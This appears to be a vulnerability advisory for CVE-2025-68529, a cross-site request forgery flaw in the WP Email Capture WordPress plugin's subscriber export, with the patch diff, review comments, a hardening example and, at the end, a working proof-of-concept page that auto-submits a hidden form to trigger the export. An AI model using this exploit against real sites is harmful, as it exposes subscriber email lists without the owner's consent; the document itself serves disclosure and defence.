Atomic Edge analysis of CVE-2025-68529:
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the WP Email Capture WordPress plugin versions up to and including 3.12.5. The vulnerability affects the plugin’s email list export functionality, allowing attackers to trick administrators into performing unauthorized data exports. The CVSS score of 4.3 reflects a medium severity impact.
Atomic Edge research identifies the root cause as missing nonce validation in the `wp_email_capture_export()` function handler. The vulnerable code in `/wp-email-capture/inc/options.php` at lines 654-657 only checked that the user was logged in and had administrator capabilities before executing the export. The function did not verify the presence or validity of a CSRF token (nonce) tied to the export request. Because the check relied on the session alone, any request carrying an administrator's cookies, including one submitted from another site, proceeded without any confirmation of user intent.
Exploitation requires an attacker to craft a malicious link or form that submits a POST request to the WordPress admin interface. The attack vector targets the plugin’s internal form handler that processes the `wp_email_capture_export` parameter. An attacker would create a webpage containing a hidden form with action set to the target WordPress admin URL and include the parameter `wp_email_capture_export=1`. When an authenticated administrator visits this page, the form automatically submits, triggering the export function without their consent.
The patch touches three files. In `/wp-email-capture/inc/dashboard.php` and `/wp-email-capture/inc/options.php`, the code now generates a nonce using `wp_create_nonce('wp-email-capture-export-nonce')` and includes it as a hidden form field named `wp_email_capture_export_nonce`. The critical fix in `/wp-email-capture/inc/options.php` lines 659-665 wraps the export function call with `wp_verify_nonce()` validation. Before the patch, any administrator request executed the export. After the patch, a request must carry a valid, recent nonce bound to that specific action.
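The following is an added example written for this analysis, not code from the WP Email Capture plugin or from Atomic Edge. It shows the export handler described above in its vulnerable shape (session and role checks only) next to a hardened shape that uses the stock WordPress helpers wp_nonce_field() and check_admin_referer() instead of hand-building the hidden field and calling wp_verify_nonce() directly. The function names prefixed `example_` and the admin_init hook are assumptions; wp_email_capture_export() is the plugin function named on the page.

```php
<?php
// Added example, not the plugin's own code. Assumes a WordPress runtime:
// wp_nonce_field, check_admin_referer, current_user_can, is_user_logged_in,
// wp_die and esc_url are WordPress core; wp_email_capture_export() is the
// plugin's export routine named in the analysis. The example_* names and the
// admin_init hook are assumptions made for illustration.

// --- Template side: render the export form with a nonce field -----------------
function example_render_export_form() {
    ?>
    <form method="post" action="<?php echo esc_url( $_SERVER['REQUEST_URI'] ); ?>#list">
        <?php
        // Emits <input type="hidden" name="wp_email_capture_export_nonce" value="...">
        // (plus a referer field) bound to the action 'wp-email-capture-export-nonce',
        // so no separate wp_create_nonce() call or string concatenation is needed.
        wp_nonce_field( 'wp-email-capture-export-nonce', 'wp_email_capture_export_nonce' );
        ?>
        <input type="hidden" name="wp_email_capture_export" value="1" />
        <input type="submit" value="Export List" class="button" />
    </form>
    <?php
}

// --- Handler side, vulnerable shape (what versions <= 3.12.5 did) -------------
function example_vulnerable_export_handler() {
    if ( ! isset( $_POST['wp_email_capture_export'] ) ) {
        return;
    }
    // Authentication and authorization only. A cross-site POST made by the
    // admin's browser carries the admin's session cookie, so both checks pass
    // and the export runs without any proof that the admin intended it.
    if ( is_user_logged_in() && current_user_can( 'administrator' ) ) {
        wp_email_capture_export();
    }
}

// --- Handler side, hardened shape --------------------------------------------
function example_hardened_export_handler() {
    if ( ! isset( $_POST['wp_email_capture_export'] ) ) {
        return;
    }
    // Check a capability rather than a role name; 'manage_options' is the
    // capability WordPress grants to administrators.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // check_admin_referer() reads the named field, verifies it against the
    // action, and stops with an "Are you sure?" page when the nonce is missing,
    // expired, or was issued for a different action. A forged form from another
    // origin cannot know the current user's nonce value, so it fails here.
    check_admin_referer( 'wp-email-capture-export-nonce', 'wp_email_capture_export_nonce' );
    wp_email_capture_export();
}

add_action( 'admin_init', 'example_hardened_export_handler' );
```

Reading the nonce from `$_POST` rather than `$_REQUEST` matches the form's method and keeps a nonce from being accepted via a query string; check_admin_referer() also handles the missing-field case without an undefined-index notice, which a bare `$_REQUEST['...']` lookup does not.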
Successful exploitation allows unauthorized export of the plugin’s entire email subscriber list as a CSV file. While this does not grant direct system access or privilege escalation, it constitutes a data breach of potentially sensitive marketing lists. Attackers could harvest email addresses for spam campaigns or phishing operations. The impact is limited to data exfiltration rather than code execution or site compromise.
--- a/wp-email-capture/inc/dashboard.php
+++ b/wp-email-capture/inc/dashboard.php
@@ -8,10 +8,13 @@
wp_email_capture_writetable( 3, '<strong>' . __( 'Last Three Members To Join', 'wp-email-capture' ) . '</strong><br/><br/>' );
+ $nonce = wp_create_nonce( 'wp-email-capture-export-nonce' );
+
echo '<br/><br/><a name="list"></a><strong>' . __( 'Export', 'wp-email-capture' ) . '</strong>';
echo '<form name="wp_email_capture_export" action="' . esc_url( $_SERVER['REQUEST_URI'] ) . '#list" method="post">';
echo '<label>' . __( 'Use the button below to export your list as a CSV to use in software such as', 'wp-email-capture' ) . ' <a href="https://www.wpemailcapture.com/recommends/aweber/" title="Email Marketing">Aweber</a>.</label>';
echo '<input type="hidden" name="wp_email_capture_export" />';
+ echo '<input type="hidden" name="wp_email_capture_export_nonce" value="' . esc_attr( $nonce ) . '"/>';
echo '<div class="submit"><input type="submit" value="' . __( 'Export List', 'wp-email-capture') . '" class="button" /></div>';
echo '</form><br/><br/>';
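Review bot: the nonce is generated with `wp_create_nonce( 'wp-email-capture-export-nonce' )` and then spliced by hand into the `wp_email_capture_export_nonce` hidden input; WordPress already provides `wp_nonce_field( 'wp-email-capture-export-nonce', 'wp_email_capture_export_nonce' )`, which emits the same hidden field (and a referer field) and avoids building the markup inside the echo string. The action string and field name are typed out again in options.php, so defining both once as constants would keep the two forms and the handler from drifting apart on a future rename.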
--- a/wp-email-capture/inc/options.php
+++ b/wp-email-capture/inc/options.php
@@ -562,11 +562,14 @@
wp_email_capture_writetable();
+ $nonce = wp_create_nonce( 'wp-email-capture-export-nonce' );
+
echo '<a name="list"></a><h3>' . __('Export', 'wp-email-capture') . '</h3>
<form name="wp_email_capture_export" action="' . esc_url($_SERVER['REQUEST_URI']) . '#list" method="post">
<label>' . __('Use the button below to export your list as a CSV to use in software such as <a href="https://www.wpemailcapture.com/recommends/aweber" title="Email Marketing">Aweber</a> or <a href="https://www.wpemailcapture.com/recommends/constant-contact/">Constant Contact</a>', 'wp-email-capture') . '</label>
<input type="hidden" name="wp_email_capture_export" />
+ <input type="hidden" name="wp_email_capture_export_nonce" value="' . esc_attr( $nonce ) . '"/>
<div class="submit">
<input type="submit" value="' . __('Export List', 'wp-email-capture') . '" class="button" />
</div>
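Review bot: this form is a near-verbatim copy of the dashboard.php one, and the nonce field name `wp_email_capture_export_nonce` now has to match the string read by the handler further down in this file; a single helper that renders the export form (including the nonce field) and is called from both pages would remove the duplicated markup and the three-way coupling of the field name.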
@@ -654,7 +657,13 @@
if (is_user_logged_in() ) {
if ( current_user_can('administrator') ) {
- wp_email_capture_export();
+
+ $verify = wp_verify_nonce( $_REQUEST['wp_email_capture_export_nonce'], 'wp-email-capture-export-nonce' );
+ if ( $verify ) {
+ wp_email_capture_export();
+ } else {
+ wp_die( "Unable to download, security check failed." );
+ }
} else {
wp_die( "Admin's Only Please" );
}
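Review bot: `$_REQUEST['wp_email_capture_export_nonce']` is read without an isset() guard, so a request that omits the field (exactly the shape of the pre-patch forged form) raises an undefined array key warning before wp_verify_nonce() returns false; use `isset( $_REQUEST['wp_email_capture_export_nonce'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['wp_email_capture_export_nonce'] ) ) : ''`, or replace the block with `check_admin_referer( 'wp-email-capture-export-nonce', 'wp_email_capture_export_nonce' )`, which handles the missing case and dies on failure. Since the form is POST-only, reading from `$_POST` instead of `$_REQUEST` would also prevent the nonce being supplied in a query string. Separately, `current_user_can('administrator')` tests a role name; a capability such as `manage_options` is the documented check.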
--- a/wp-email-capture/wp-email-capture.php
+++ b/wp-email-capture/wp-email-capture.php
@@ -4,7 +4,7 @@
Plugin Name: WP Email Capture
Plugin URI: https://www.wpemailcapture.com/?utm_source=plugin-link&utm_medium=plugin&utm_campaign=wpemailcapture
Description: Captures email addresses for insertion into software such as <a href="https://www.wpemailcapture.com/recommends/aweber" title="Email Marketing">Aweber</a>, <a href="https://www.wpemailcapture.com/recommends/constant-contact/">Constant Contact</a> or <a href="https://www.wpemailcapture.com/recommends/mailchimp/">Mailchimp</a>
-Version: 3.12.5
+Version: 3.12.6
Author: Winwar Media
Author URI: https://www.winwar.co.uk/?utm_source=author-link&utm_medium=plugin&utm_campaign=wpemailcapture
License: GPL2
@@ -21,7 +21,7 @@
define( 'WP_EMAIL_CAPTURE_URL', plugins_url( '', __FILE__ ) );
define( 'WP_EMAIL_CAPTURE_TEMP_MEMBERS_TABLE', $wpdb->prefix . 'wp_email_capture_temp_members' );
define( 'WP_EMAIL_CAPTURE_REGISTERED_MEMBERS_TABLE', $wpdb->prefix . 'wp_email_capture_registered_members' );
-define( 'WP_EMAIL_CAPTURE_VERSION', '3.12.5' );
+define( 'WP_EMAIL_CAPTURE_VERSION', '3.12.6' );
define( 'WP_EMAIL_MIN_MYSQL_VERSION', '5.6' );
require_once WP_EMAIL_CAPTURE_PATH . '/inc/core.php';
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68529 - Email Capture <= 3.12.5 - Cross-Site Request Forgery
// Configuration
$target_url = 'https://vulnerable-site.com/wp-admin/admin.php?page=wp-email-capture%2Finc%2Foptions.php';
// Note: The exact admin page URL may vary based on WordPress configuration.
// The export functionality is triggered via POST to the plugin's options page.
// This PoC simulates an attacker's malicious page that tricks an admin into CSRF.
// In a real attack, this would be hosted on an attacker-controlled domain.
echo '<html><body>';
echo '<h2>CSRF PoC for WP Email Capture Export</h2>';
echo '<p>This page contains a hidden form that automatically submits to the target WordPress admin panel.</p>';
echo '<p>If a logged-in administrator visits this page, their browser will export the email list.</p>';
// Create the auto-submitting form
echo '<form id="csrf_form" method="POST" action="' . htmlspecialchars($target_url) . '">';
// The vulnerable parameter that triggers the export
echo '<input type="hidden" name="wp_email_capture_export" value="1" />';
// Note: The vulnerable version does not require a nonce parameter.
echo '</form>';
echo '<script>document.getElementById("csrf_form").submit();</script>';
echo '</body></html>';
// Alternative method using cURL for direct testing (requires admin cookies):
/*
$ch = curl_init($target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, ['wp_email_capture_export' => '1']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// You would need to add the administrator's cookies via CURLOPT_COOKIE here.
$response = curl_exec($ch);
curl_close($ch);
echo $response;
*/
?>